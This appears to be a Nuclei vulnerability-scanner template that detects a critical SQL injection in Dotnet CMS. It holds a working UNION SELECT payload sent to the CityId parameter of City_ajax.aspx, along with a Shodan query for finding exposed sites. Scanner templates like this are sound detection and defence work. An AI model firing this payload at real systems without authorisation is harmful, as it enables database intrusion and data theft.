id: dotnetcms-sqli

info:
  name: Dotnet CMS -  SQL Injection
  author: ritikchaddha
  severity: critical
  description: Dotnet CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.cnblogs.com/rebeyond/p/4951418.html
    - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-89
  metadata:
    verified: true
    shodan-query: http.html:"dotnetcms"
  tags: dotnetcms,dotnet,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{randstr}}')),2--"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5("{{randstr}}")}}'

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/28
